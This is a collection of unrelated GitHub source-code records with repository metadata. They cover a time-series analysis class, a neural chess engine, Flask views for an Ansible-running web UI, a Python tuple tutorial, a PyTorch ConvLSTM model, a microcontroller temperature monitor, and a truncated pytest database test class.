= net_params[layer][n]\r\n\r\n caffe_model.save(caffe_params_file)","repo_name":"GoNgXiAoPeNg1/caffe-keras","sub_path":"keras2caffe.py","file_name":"keras2caffe.py","file_ext":"py","file_size_in_byte":13201,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"2555190995","text":"import numpy as np\r\nfrom scipy.special import ndtr\r\nfrom bb8TSA.TSA.dataBinModules import BinnedOrganisations, stack_c_DFs\r\nfrom bb8TSA.TSA.statModules import StatIndic\r\nfrom bb8TSA.TSA.tendanceModules import Tendance, constrained_tendance\r\n\r\nclass TimeSeriesAnalysis( BinnedOrganisations, StatIndic, Tendance ):\r\n \"\"\"Time Series Analysis Class.\r\n\r\n Parameters\r\n ----------\r\n BinnedOrganisations : class\r\n Time series construction class.\r\n Time series are kept in a dataframe with 3 columns : organName, date and binCount\r\n Provides methods to bin the data according to given time-bin (freq)\r\n Each bin contains the citation count for a given organisation.\r\n\r\n StatIndic : class\r\n Provides methods to extract statistical indicators for time series extracted by\r\n BinnedOrganisations class.\r\n\r\n Tendance : class\r\n Provides methods to determine increase/decrease tendency in citations for the time series\r\n\r\n\r\n nameCol : str\r\n Column containing the name of the organisations\r\n\r\n dateCol : str\r\n Column containing the measurement date\r\n\r\n countCol : str, optional\r\n Column containing the wait parameter if exist.\r\n\r\n countFlag : Boolean\r\n True if countCol is included. False by default\r\n\r\n\r\n freq : str\r\n The bin size in weeks or a month {\"W\", \"2W\", \"3W\", \"M\"}\r\n default is month (\"M\")\r\n\r\n groupKey : str\r\n For grouping by organisation name. Keep the default value.\r\n\r\n targetCol : str\r\n Target column for aggregations. 
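# A minimal sketch of the binning described in the docstring above: rows of
# (organName, date) grouped per organisation into time bins of a chosen freq.
# This assumes a groupby with pd.Grouper; the real BinnedOrganisations class
# may differ in details, and the toy data is invented.
import pandas as pd

raw = pd.DataFrame({
    'organName': ['acme', 'acme', 'acme', 'globex'],
    'date': pd.to_datetime(['2020-01-03', '2020-01-20',
                            '2020-02-02', '2020-01-10']),
})
binned = (raw.groupby(['organName', pd.Grouper(key='date', freq='M')])
             .size().rename('binCount').reset_index())
print(binned)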
Keep the default value.\r\n\r\n    intp : Boolean\r\n        True by default to include interpolation to compute the variability of a time series.\r\n\r\n    numBins : str\r\n        Name for the column to count the total number of bins for each time series\r\n\r\n    medSeuil : float\r\n        A factor to define the threshold to detect an outlier count (shock).\r\n        outlier > medSeuil * median\r\n\r\n    minNumBins : int\r\n        Minimum number of bins needed for statistical computations\r\n\r\n    meanCount : int\r\n        Minimum average accepted number of citations.\r\n\r\n    nLeader : int\r\n        Size of the list containing the first most cited organisations.\r\n\r\n    simpFit : boolean\r\n        True to fit a line to time series excluding the shock outliers, False otherwise\r\n\r\n    noiseRatio : float\r\n        This parameter is used to constrain the evident tendencies.\r\n        If the ratio between the slope error and the slope of the fitted line is more\r\n        than the noiseRatio the time series is excluded.\r\n\r\n    memSeuil : float\r\n        Maximum memory to be used to load all dataframes in DFs\r\n\r\n    Attributes\r\n    ----------\r\n    tendance_info : dataframe\r\n        Contains the name of the organisation, the slope and slope error of the fitted line to the\r\n        time series and the p_value with a horizontal line as the null-hypothesis.\r\n\r\n    \"\"\"\r\n\r\n    def __init__(self, nameCol=\"organName\", dateCol=\"date\", countCol=None, countFlag=False,\r\n                 freq=\"M\", groupKey=\"organName\", targetCol=\"binCount\", intp=True,\r\n                 numBins=\"numBins\", medSeuil=20., minNumBins=6, meanCount=20, nLeader=120, simpFit=False,\r\n                 noiseRatio=.5, memSeuil=5.):\r\n        self.groupKey = groupKey\r\n        self.nameCol= nameCol\r\n        self.dateCol = dateCol\r\n        self.countCol = countCol\r\n        self.targetCol = targetCol\r\n        self.noiseRatio = noiseRatio\r\n        self.simpFit = simpFit\r\n        self.intp = intp\r\n        self.numBins = numBins\r\n        self.freq = freq\r\n        self.minNumBins = minNumBins\r\n        self.meanCount = meanCount\r\n        self.countFlag = countFlag\r\n        self.medSeuil = medSeuil\r\n        self.nLeader = nLeader\r\n        self.memSeuil = memSeuil\r\n\r\n        print(\"TimeSeriesAnalysis class initialised.\")\r\n        BinnedOrganisations.__init__(self, nameCol, dateCol, countCol, freq, minNumBins, countFlag)\r\n        StatIndic.__init__(self)\r\n        Tendance.__init__(self)\r\n\r\n\r\n    def fit(self, DFs, fileList=None):\r\n        \"\"\" Extracts statistical information from the input dataframes\r\n        Parameters\r\n        ----------\r\n        DFs : list of dataframes\r\n            Dataframes read from different file sources.\r\n            Each dataframe should have at least 2 columns : name and date\r\n\r\n        fileList : list of str, optional\r\n            List containing the name of the source files of the data frames with the same\r\n            order as DFs.\r\n\r\n        \"\"\"\r\n\r\n        self.load_DFs(DFs, fileList)\r\n        # (BinnedOrganisations method)\r\n\r\n        if self.countFlag :\r\n            for i, df in enumerate(self._organ_DFs) :\r\n                if self.countCol is None :\r\n                    raise KeyError( \"countCol name not specified.\" )\r\n                elif self.countCol not in self._organ_DFs[i].columns :\r\n                    raise KeyError(\"{} not found in schema.\".format(self.countCol))\r\n\r\n                self._organ_DFs[i] = self._organ_DFs[i][[self.nameCol, self.dateCol, self.countCol]].copy()\r\n                self._organ_DFs[i].columns = [\"organName\", \"date\", \"count\"]\r\n        else :\r\n            for i, df in enumerate(self._organ_DFs):\r\n                self._organ_DFs[i] = self._organ_DFs[i][[self.nameCol, self.dateCol]].copy()\r\n                self._organ_DFs[i].columns = [\"organName\", \"date\"]\r\n\r\n        fit_info = self.compute_tendance_DFs()[ [\"organName\", 
\"mean\", \"median\", \"sigmasRatio\", \"intercept\",\r\n                                                   \"slope\", \"slopeErr\", \"max\", \"linePValue\", \"numBins\"] ]\\\r\n            if self.simpFit \\\r\n            else self.compute_tendance_DFs()[ [\"organName\", \"mean\", \"median\", \"sigmasRatio\",\r\n                                               \"slope\", \"slopeErr\", \"max\", \"numBins\", \"intercept\"] ]\r\n\r\n\r\n        fit_info[\"citation_rank\"] = range(1, len(fit_info)+1)\r\n\r\n        shock_list = self.compute_schock_list(fit_info, medSeuil=self.medSeuil)\r\n        fit_info[\"count_shoot\"] = \"No\"\r\n        fit_info.loc[ fit_info[\"organName\"].isin(shock_list), \"count_shoot\" ] = \"Yes\"\r\n\r\n        fit_info[\"nbinR\"] = (fit_info[\"numBins\"]-1.)/fit_info[\"numBins\"]\r\n        fit_info[\"variability\"] = \"\"\r\n        fit_info.loc[fit_info[\"sigmasRatio\"]<=1, \"variability\"]=\"Low\"\r\n        fit_info.loc[fit_info[\"sigmasRatio\"]<=fit_info[\"nbinR\"], \"variability\"]=\"None\"\r\n        fit_info.loc[fit_info[\"sigmasRatio\"]>1, \"variability\"]=\"Moderate\"\r\n        fit_info.loc[fit_info[\"sigmasRatio\"]>=2, \"variability\"]=\"High\"\r\n\r\n        fit_info[\"tendency\"] = \"Const\"\r\n        fit_info.loc[fit_info[\"slope\"]<-1.e-6, \"tendency\"] = \"Decrease\"\r\n        fit_info.loc[fit_info[\"slope\"]>1.e-6, \"tendency\"] = \"Increase\"\r\n\r\n        #fit_info[\"p_0\"] = round(fit_info[\"linePValue\"], 2)\r\n\r\n        def compute_p_0(row) :\r\n            p_0 = ndtr(-row[0]/row[1]) if row[0]>0 else 1.- ndtr(-row[0]/row[1])\r\n            return p_0\r\n        fit_info[\"p_0\"] = fit_info[[\"slope\", \"slopeErr\"]].apply(compute_p_0, axis=1)\r\n        fit_info[\"p_0\"] = round(fit_info[\"p_0\"], 2)\r\n        fit_info.loc[ (abs(fit_info[\"slope\"])<1.e-6) & (fit_info[\"slopeErr\"].isnull().values.any()), \"p_0\"] = 1.\r\n\r\n        self.tendance_info = fit_info[[\"organName\", \"slope\", \"slopeErr\", \"intercept\", \"p_0\"]]\r\n\r\n        fit_info.rename(columns={\"mean\": \"mean_citation\"}, inplace=True)\r\n\r\n        self._fit_info = fit_info[[\"organName\", \"mean_citation\", \"citation_rank\", \"count_shoot\", \"variability\",\r\n                                   \"tendency\", \"p_0\", \"numBins\"]]\r\n\r\n\r\n    def transform(self) :\r\n        \"\"\"\r\n        :return: dataframe\r\n            A dataframe showing the citation rank and tendency of an organisation and whether\r\n            the corresponding time series shows variability and/or a count shock.\r\n\r\n        \"\"\"\r\n        return self._fit_info\r\n\r\n    def fit_transform(self, DFs, fileList=None):\r\n        \"\"\" Performs fit and transform as provided by the TimeSeriesAnalysis class.\r\n        :param DFs: list of dataframes\r\n            combined time series.\r\n        :param fileList: list of str, optional\r\n        :return: dataframe\r\n        \"\"\"\r\n        self.fit(DFs, fileList)\r\n        return self.transform()\r\n\r\n\r\n    def compute_tendance_DFs(self):\r\n        \"\"\" Computes the tendency of the time series extracted from the input dataframes.\r\n        (tendanceModules.py)\r\n\r\n        return\r\n        ------\r\n        The tendency dataframe\r\n        \"\"\"\r\n\r\n        df_c = self.stackDFs()\r\n        statTable = self.compute_stat(df_c, groupKey=self.groupKey, targetCol=self.targetCol,\r\n                                      intp=self.intp, numBins=self.numBins)\r\n        df_tendance = self.compute_tendance(df_c, statTable, freq=self.freq, simpFit=self.simpFit)\r\n        return df_tendance\r\n\r\n    def compute_stat_DFs(self) :\r\n        \"\"\" Computes the statistical indicators of the time series extracted from the input dataframes.\r\n        (statModules.py)\r\n\r\n        return\r\n        ------\r\n        Table of statistics including the variability parameter sigmasRatio.\r\n        \"\"\"\r\n        df_c = self.stackDFs()\r\n        statTable = self.compute_stat(df_c, groupKey=self.groupKey, targetCol=self.targetCol,\r\n                                      intp=self.intp, numBins=self.numBins)\r\n        return statTable\r\n\r\n\r\n    def get_df(self, 
DFs):\r\n        \"\"\"\r\n        :param DFs: list of dataframes\r\n        :return: dataframe\r\n            cleaned binned dataframe\r\n        \"\"\"\r\n        self.load_DFs(DFs)\r\n        return self.stackDFs()\r\n\r\n\r\n    def stackDFs(self):\r\n        \"\"\" Stack the binned input dataframes. (dataBinModules.py)\r\n        return\r\n        ------\r\n        The stacked dataframe\r\n        \"\"\"\r\n        # Filtering the binned dataframes with number of bins > minNumBins\r\n        c_dfs = self.extract_cleand_binned_DFs\r\n        # Concatenating all binned dataframes\r\n        df_c = stack_c_DFs(c_dfs, memSeuil=self.memSeuil)\r\n        return df_c\r\n\r\n\r\n    def constrained_tendance_DFs(self):\r\n        \"\"\" Computes the constrained tendency with respect to the noiseRatio.\r\n        (tendanceModules.py)\r\n\r\n        return\r\n        ------\r\n        The constrained tendency dataframe\r\n        \"\"\"\r\n        df_tendance = self.compute_tendance_DFs()\r\n        return constrained_tendance(df_tendance, noiseRatio=self.noiseRatio, minNumBins=self.minNumBins)\r\n\r\n    def compute_schock_list_DFs(self):\r\n        \"\"\" Computes the list of organisations containing outliers (shocks) with respect to medSeuil\r\n        (statModules.py)\r\n\r\n        return\r\n        ------\r\n        List of organisation names\r\n        \"\"\"\r\n        statTable = self.compute_stat_DFs()\r\n        return self.compute_schock_list(statTable, self.medSeuil)\r\n\r\n    def get_most_var_list_DFs(self):\r\n        \"\"\" Computes the list of organisations containing the most variations in time\r\n        (statModules.py)\r\n\r\n        return\r\n        ------\r\n        List of organisation names\r\n        \"\"\"\r\n        statTable = self.compute_stat_DFs()\r\n        return self.get_most_var_list(statTable, minNumBins=self.minNumBins, meanCount=self.meanCount)\r\n\r\n    def get_leader_list_DFs(self):\r\n        \"\"\" Computes the list of the first nLeader organisations.\r\n        (statModules.py)\r\n\r\n        return\r\n        ------\r\n        List of organisation names\r\n        \"\"\"\r\n        statTable = self.compute_stat_DFs()\r\n        return self.get_leader_list(statTable, nLeader=self.nLeader)\r\n\r\n","repo_name":"farhangh/TimeSeries","sub_path":"bb8TSA/TSA/tsaModules.py","file_name":"tsaModules.py","file_ext":"py","file_size_in_byte":11418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7685612795","text":"from chessai.model import get_model\nfrom chessai.board_utils import tensor2move, get_position_tensor\nimport chess\nimport numpy as np\n\nclass Engine:\n    def __init__(self, path):\n        self.model = get_model()\n        self.model.initialize()\n        self.model.load_params(path)\n        self.board = None\n    \n    def position(self, board):\n        self.board = board\n    \n    def go(self, movetime):\n        feature_tensor = get_position_tensor(self.board, white=self.board.turn)\n        ohe = np.expand_dims(feature_tensor, axis=0)\n        move_tensor = self.model.predict(ohe)[0]\n        move = chess.Move.from_uci(tensor2move(move_tensor, white=self.board.turn))\n\n        while move not in self.board.legal_moves:\n            y, x, n = np.unravel_index(move_tensor.argmax(), move_tensor.shape)\n            move_tensor[y, x, n] = 0\n            move = chess.Move.from_uci(tensor2move(move_tensor, white=self.board.turn))\n        \n        return [move]\n","repo_name":"zzmtsvv/chessai","sub_path":"chessnet.py","file_name":"chessnet.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37573535599","text":"\"\"\" All flask UI routes/views defined in here. 
\"\"\"\r\nimport os\r\nimport datetime\r\nfrom datetime import timedelta\r\nimport logging\r\nimport tzlocal\r\n\r\nfrom flask import render_template, flash, redirect, request, url_for, session, Response, stream_with_context, send_from_directory, Blueprint, abort\r\nfrom flask_login import login_user, current_user, logout_user, login_required\r\nfrom flask_ldap3_login.forms import LDAPLoginForm\r\n\r\nfrom app import app, buttons, stream_template, is_safe_url\r\nfrom app.ui.mailer_ui import send_email_ui\r\n# Import Class/DB tables from Models\r\nfrom app.database.models import Runhistory\r\n# This needs to be imported after the database is initialized and table created\r\nfrom app.ui.connect_ssh_ui import test_ssh, run_ssh_ui\r\n\r\nlog = logging.getLogger('app')\r\n#default = Blueprint('default', __name__, template_folder = 'templates/ui')\r\nui_blueprint = Blueprint('ui', __name__, template_folder='templates/ui')\r\n\r\n\r\n# Declare ROUTES\r\n\r\n@ui_blueprint.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n    # Instantiate a LDAPLoginForm which has a validator to check if the user exists in LDAP.\r\n    form = LDAPLoginForm(request.form)\r\n    if request.method == 'GET':\r\n        return render_template('login.html', form=form)\r\n    else:\r\n        if form.validate_on_submit():\r\n            if form.user:\r\n                login_user(form.user)\r\n                # Successfully logged in; we can now access the saved user object via form.user.\r\n                name = str(form.user).split(',')[0][3:]\r\n                app.logger.info('%s successfully logged in!', name) # Log who logged in\r\n                next = request.args.get('next')\r\n                # is_safe_url from __init__.py should check if the url is safe for redirects.\r\n                # See http://flask.pocoo.org/snippets/62/ for an example.\r\n                if not is_safe_url(next):\r\n                    return abort(400)\r\n                return redirect(next or url_for('ui.index')) # Send them home\r\n            else:\r\n                error = True\r\n                name = str(form.username.data)\r\n                app.logger.warn('Invalid login attempt by user: %s !', name)\r\n                return render_template('login.html', form=form, error=error)\r\n        else:\r\n            name = str(form.username.data)\r\n            app.logger.warn('Invalid login attempt by user: %s', name)\r\n            return render_template('login.html', form=form)\r\n\r\n@ui_blueprint.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n    if not current_user or current_user.is_anonymous:\r\n        return redirect(url_for('ui.login'))\r\n    # User is logged in so we can load home page in all its beauty!\r\n    return render_template(\"index.html\", buttons=buttons)\r\n\r\n@ui_blueprint.route('/run', methods=['GET', 'POST'])\r\n@login_required\r\ndef run():\r\n    # Here we search for passed values from each of the buttons configured in buttons.yml and assign ansible playbooks that correspond to them.\r\n    if request.method == 'POST':\r\n        id = request.form['pass_value']\r\n        cmd = None\r\n        for btn in buttons:\r\n            if btn['_id'] == id:\r\n                cmd = (btn['_cmd'])\r\n        if cmd is None:\r\n            # How did we get here? 
This is just in case user calls /run manually\r\n            return redirect('/')\r\n\r\n        try:\r\n            test_ssh(cmd)\r\n        except ValueError as e:\r\n            app.logger.error('ERROR: %s ', str(e))\r\n            flash('{}'.format(str(e)), 'danger')\r\n            return redirect(url_for('ui.index'))\r\n        else:\r\n            tz = datetime.datetime.now(tzlocal.get_localzone())\r\n            runlog = os.path.join(\"ansible-ui-runlog-\" + id + \"-\" + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S-') + (tz.tzname()) + \".log\")\r\n            session['runlog'] = runlog\r\n            runlog_path = os.path.join(app.config['APP_PATH'], \"logs\", runlog)\r\n            app.logger.info('%s executed playbook with id: %s', str(current_user).split(',')[0][3:], id)\r\n            app.logger.info('created playbook runlog file %s', runlog)\r\n            data = run_ssh_ui(cmd, runlog_path)\r\n            return Response(stream_with_context(stream_template('run.html', data=data)), mimetype='text/html')\r\n\r\n@ui_blueprint.route('/download', methods=['GET', 'POST'])\r\n@login_required\r\ndef download():\r\n    runlog = session.get('runlog', None)\r\n    app.logger.info('%s downloaded runlog file %s', str(current_user).split(',')[0][3:], runlog)\r\n    return send_from_directory(directory=os.path.join(app.config['APP_PATH'], \"logs\"), filename=runlog, as_attachment=True)\r\n\r\n@ui_blueprint.route('/email', methods=['GET', 'POST'])\r\n@login_required\r\ndef email():\r\n    runlog = session.get('runlog', None)\r\n    recipient_email = request.form['emails']\r\n    try:\r\n        send_email_ui(recipient_email, runlog)\r\n    except Exception as e:\r\n        app.logger.error('Mail to recipients %s failed because of %s', recipient_email, (str(e)))\r\n        flash('Mail failed: {}'.format(str(e)), 'danger')\r\n    else:\r\n        app.logger.info('%s emailed runlog file %s to recipients : %s', str(current_user).split(',')[0][3:], runlog, recipient_email)\r\n        flash('Email sent successfully', 'info')\r\n    finally:\r\n        return redirect(url_for('ui.index'))\r\n\r\n@ui_blueprint.route('/logout', methods=['POST', 'GET'])\r\n@login_required\r\ndef logout():\r\n    app.logger.info('user %s successfully logged out!', str(current_user).split(',')[0][3:]) # Log who logged out\r\n    logout_user()\r\n    flash('You have been logged out.', 'info')\r\n    return redirect(url_for('ui.login'))\r\n\r\n@ui_blueprint.route('/runhistory', methods=['GET', 'POST'])\r\n@login_required\r\ndef runhistory():\r\n    page = request.args.get('page', 1, type=int)\r\n    runhistory = Runhistory.query.order_by(Runhistory.time_started.desc()).paginate(page, app.config['POSTS_PER_PAGE'], False)\r\n    next_url = url_for('ui.runhistory', page=runhistory.next_num) \\\r\n        if runhistory.has_next else None\r\n    prev_url = url_for('ui.runhistory', page=runhistory.prev_num) \\\r\n        if runhistory.has_prev else None\r\n    return render_template('runhistory.html', runhistory=runhistory.items, next_url=next_url, prev_url=prev_url)\r\n\r\n@ui_blueprint.route('/viewlog/<logfile>', methods=['GET', 'POST'])\r\n@login_required\r\ndef viewlog(logfile):\r\n    file_path = os.path.join(app.config['APP_PATH'], \"logs\", logfile)\r\n    text = open(file_path, 'r+')\r\n    content = text.read()\r\n    text.close()\r\n    return render_template('viewlog.html', text=content)\r\n\r\n# Error views\r\n@app.errorhandler(404)\r\ndef error_404(error):\r\n    return render_template('error_pages/404.html'), 404\r\n\r\n@app.errorhandler(403)\r\ndef error_403(error):\r\n    return render_template('error_pages/403.html'), 403\r\n\r\n@app.errorhandler(500)\r\ndef error_500(error):\r\n    app.logger.warning('user %s got 500 page', str(current_user).split(',')[0][3:])\r\n    app.logger.warning('error is: %s', 
error)\r\n    return render_template('error_pages/500.html'), 500\r\n","repo_name":"dpilipovic/flansible","sub_path":"app/ui/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"17574297680","text":"\"\"\"\nTuples: very similar to lists, with these differences:\n1. Tuple data cannot be modified (similar to a Java enum)\n2. Tuples are defined with () while lists use []\nExample:\ninfo_tuple = (\"ZhangSan\", 18, 1.75)\n\nUse cases:\n1. Function parameters or return values: any number of values can be passed in and returned\n2. String formatting\n3. Making a list unmodifiable, similar to an enum\n\"\"\"\n\n\ndef tuple_test(test):\n    if not test:\n        return\n    info_tuple = (\"ZhangSan\", 18, 1.75)\n    print(type(info_tuple))\n    print(info_tuple[2])\n    # Empty tuple\n    empty_tuple = ()\n    print(type(empty_tuple))\n    # Single-element tuple\n    single_tuple = (5,)  # if defined as (5), the interpreter treats it as an int\n\n    # index of the first occurrence of 18\n    index = info_tuple.index(18)\n    # count the number of occurrences\n    number = info_tuple.count(1.75)\n    print(\"Index of the first occurrence of 18: %d\" % index)\n    print(number)\n    # Iterate\n    for tuple_member in info_tuple:\n        print(tuple_member)\n\n    # String formatting: the trailing \"( )\" is essentially a tuple\n    print(\"%s is %d years old and %.2f tall\" % (\"ZhangSan\", 18, 1.75))\n    print(\"%s is %d years old and %.2f tall\" % info_tuple)\n\n\ntuple_test(False)\n\n\ndef list_tuple_convert(test):\n    if not test:\n        return\n    num_list = [1, 2, 3, 4]\n\n    # list to tuple: mutable data becomes unmodifiable, protecting the data\n    num_tuple = tuple(num_list)\n    print(type(num_tuple))\n\n    # tuple to list: unmodifiable data becomes modifiable again\n    num_list2 = list(num_tuple)\n    print(type(num_list2))\n\n\nlist_tuple_convert(False)\n","repo_name":"hurtnotbad/pythonStudy","sub_path":"studyNotes/grammar/tuple-test.py","file_name":"tuple-test.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18232922659","text":"# ------------------------------------------------------------------------------\n# --coding='utf-8'--\n# Written by czifan (czifan@pku.edu.cn)\n# ------------------------------------------------------------------------------\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\n\nclass ConvLSTMBlock(nn.Module):\n    def __init__(self, in_channels, num_features, kernel_size=3, padding=1, stride=1):\n        super().__init__()\n        self.num_features = num_features\n        self.conv = self._make_layer(in_channels+num_features, num_features*4,\n                                     kernel_size, padding, stride)\n\n    def _make_layer(self, in_channels, out_channels, kernel_size, padding, stride):\n        return nn.Sequential(\n            nn.Conv2d(in_channels, out_channels,\n                      kernel_size=kernel_size, padding=padding, stride=stride, bias=False),\n            nn.BatchNorm2d(out_channels))\n\n    def forward(self, inputs):\n        '''\n\n        :param inputs: (B, S, C, H, W)\n        :param hidden_state: (hx: (B, S, C, H, W), cx: (B, S, C, H, W))\n        :return:\n        '''\n        outputs = []\n        B, S, C, H, W = inputs.shape\n        hx = torch.zeros(B, self.num_features, H, W).to(inputs.device)\n        cx = torch.zeros(B, self.num_features, H, W).to(inputs.device)\n        for t in range(S):\n            combined = torch.cat([inputs[:, t], # (B, C, H, W)\n                                  hx], dim=1)\n            gates = self.conv(combined)\n            ingate, forgetgate, cellgate, outgate = torch.split(gates, self.num_features, dim=1)\n            ingate = torch.sigmoid(ingate)\n            forgetgate = torch.sigmoid(forgetgate)\n            cellgate = torch.tanh(cellgate) # the standard LSTM cell passes the candidate cell state through tanh\n            outgate = torch.sigmoid(outgate)\n\n            cy = (forgetgate * cx) + (ingate * cellgate)\n            hy = outgate * torch.tanh(cy)\n            outputs.append(hy)\n            hx = hy\n            cx = cy\n\n        return torch.stack(outputs).permute(1, 0, 2, 3, 4).contiguous() # (S, B, C, H, W) -> (B, S, C, H, W)\n\nclass Encoder(nn.Module):\n    def __init__(self, 
config):\n super().__init__()\n self.layers = []\n for idx, params in enumerate(config.encoder):\n setattr(self, params[0]+'_'+str(idx), self._make_layer(*params))\n self.layers.append(params[0]+'_'+str(idx))\n\n def _make_layer(self, type, activation, in_ch, out_ch, kernel_size, padding, stride):\n layers = []\n if type == 'conv':\n layers.append(nn.Conv2d(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride, bias=False))\n layers.append(nn.BatchNorm2d(out_ch))\n if activation == 'leaky': layers.append(nn.LeakyReLU(inplace=True))\n elif activation == 'relu': layers.append(nn.ReLU(inplace=True))\n elif type == 'convlstm':\n layers.append(ConvLSTMBlock(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n '''\n :param x: (B, S, C, H, W)\n :return:\n '''\n outputs = [x]\n for layer in self.layers:\n if 'conv_' in layer:\n B, S, C, H, W = x.shape\n x = x.view(B*S, C, H, W)\n x = getattr(self, layer)(x)\n if 'conv_' in layer: x = x.view(B, S, x.shape[1], x.shape[2], x.shape[3])\n if 'convlstm' in layer: outputs.append(x)\n return outputs\n\nclass Decoder(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.layers = []\n for idx, params in enumerate(config.decoder):\n setattr(self, params[0]+'_'+str(idx), self._make_layer(*params))\n self.layers.append(params[0]+'_'+str(idx))\n\n def _make_layer(self, type, activation, in_ch, out_ch, kernel_size, padding, stride):\n layers = []\n if type == 'conv':\n layers.append(nn.Conv2d(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride, bias=False))\n layers.append(nn.BatchNorm2d(out_ch))\n if activation == 'leaky': layers.append(nn.LeakyReLU(inplace=True))\n elif activation == 'relu': layers.append(nn.ReLU(inplace=True))\n elif activation == 'sigmoid': layers.append(nn.Sigmoid())\n elif type == 'convlstm':\n layers.append(ConvLSTMBlock(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride))\n elif type == 'deconv':\n layers.append(nn.ConvTranspose2d(in_ch, out_ch, kernel_size=kernel_size, padding=padding, stride=stride, bias=False))\n layers.append(nn.BatchNorm2d(out_ch))\n if activation == 'leaky': layers.append(nn.LeakyReLU(inplace=True))\n elif activation == 'relu': layers.append(nn.ReLU(inplace=True))\n return nn.Sequential(*layers)\n\n def forward(self, encoder_outputs):\n '''\n :param x: (B, S, C, H, W)\n :return:\n '''\n idx = len(encoder_outputs)-1\n for layer in self.layers:\n if 'conv_' in layer or 'deconv_' in layer:\n x = encoder_outputs[idx]\n B, S, C, H, W = x.shape\n x = x.view(B*S, C, H, W)\n x = getattr(self, layer)(x)\n x = x.view(B, S, x.shape[1], x.shape[2], x.shape[3])\n elif 'convlstm' in layer:\n idx -= 1\n x = torch.cat([encoder_outputs[idx], x], dim=2)\n x = getattr(self, layer)(x)\n encoder_outputs[idx] = x\n return x\n\nclass ConvLSTM(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.encoder = Encoder(config)\n self.decoder = Decoder(config)\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n return x\n\nif __name__ == '__main__':\n from thop import profile\n from configs.config_3x3_16_3x3_32_3x3_64 import config\n model = ConvLSTM(config)\n flops, params = profile(model, inputs=(torch.Tensor(4, 10, 1, 64, 64),))\n print(flops / 1e9, params / 
1e6)\n\n","repo_name":"czifan/ConvLSTM.pytorch","sub_path":"networks/ConvLSTM.py","file_name":"ConvLSTM.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"18"} +{"seq_id":"32436999601","text":"\"\"\"Temperature monitor\"\"\"\n\nimport machine\nimport utime\n\nsensor_temp = machine.ADC(4)\n\nCONVERSION_FACTOR = 3.3 / (65535)\n\n#file = open(\"temps.txt\", \"w\")\n\nled_red = machine.Pin(15, machine.Pin.OUT)\nled_green = machine.Pin(14, machine.Pin.OUT)\n\nled_onboard = machine.Pin(25, machine.Pin.OUT)\n\n\ndef leds_off():\n    led_onboard.value(0)\n    led_green.value(0)\n    led_red.value(0)\n\ndef leds_on():\n    led_onboard.value(1)\n    led_green.value(1)\n    led_red.value(1)\n\ndef blink():\n    leds_off()\n    leds_on()\n    utime.sleep(.5)\n    leds_off()\n    utime.sleep(.5)\n    leds_on()\n    utime.sleep(.5)\n    leds_off()\n\nwhile True:\n    reading = sensor_temp.read_u16() * CONVERSION_FACTOR\n    temperature = 27 - (reading - 0.706)/0.001721\n\n    if temperature <= 29.0:\n        leds_off()\n        led_green.value(1)\n    elif temperature > 29.0:\n        leds_off()\n        led_red.value(1)\n    else:\n        leds_on()\n\n    print(temperature)\n    #file.write(str(temperature))\n    #file.flush()\n    utime.sleep(5)\n\n","repo_name":"javed0863/RP2040","sub_path":"temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"43643189809","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\n@author: leason\n@time: 2017/10/19 17:12\n\"\"\"\nimport pytest\nfrom ..test import session, ModelBase, db\nfrom ..test import SingleQuery, MultiQuery, SingleInsert, SingleModify, DeleteOne, DeleteSome, QueryOne\nfrom ..test import News, Tag, Type\n\n\n# content of test_class.py\nclass TestClass:\n\n    def setup(self):\n        \"\"\"\n        Initialize the database\n        :return:\n        \"\"\"\n\n        ModelBase.metadata.create_all(bind=db)\n\n        # tag table data\n        tag_add = {\n            \"tag_name\": \"123\"\n        }\n        SingleInsert(tag_add).add_method(session, Tag)\n\n        # type table data\n        type_add = {\n            \"type_name\": \"123\"\n        }\n        SingleInsert(type_add).add_method(session, Type)\n\n        # news table data\n        item_add = {\n            \"name\": 'leason',\n            \"des\": 123456,\n            \"type_id\": 1,\n            \"tag_id\": 1\n        }\n        SingleInsert(item_add).add_method(session, News)\n\n    def teardown(self):\n        \"\"\"\n        Clear the database\n        :return:\n        \"\"\"\n        ModelBase.metadata.drop_all(bind=db)\n\n    def test_add(self):\n        \"\"\"\n        Test for the add method\n        :return:\n        \"\"\"\n        item_add = {\n            \"name\": 'leason',\n            \"des\": 123456\n        }\n        result_add = SingleInsert(item_add).add_method(session, News)\n        assert result_add is True\n\n    def test_modify(self):\n        \"\"\"\n        Test for the modify method\n        :return:\n        \"\"\"\n        data = {\n            \"primary_key\": {\n                \"id\": 1\n            },\n            \"items\": {\n                \"name\": \"llx\",\n                \"des\": 845\n            }\n        }\n        result_modify = SingleModify(data['primary_key'], data['items']).modify_method(session, News)\n        assert result_modify is True\n\n    def test_single_query(self):\n        \"\"\"\n        Test for single-table query\n        :return:\n        \"\"\"\n        cond = {\n            \"name\": \"\",\n            \"des\": \"\",\n            \"create_time\": {\n             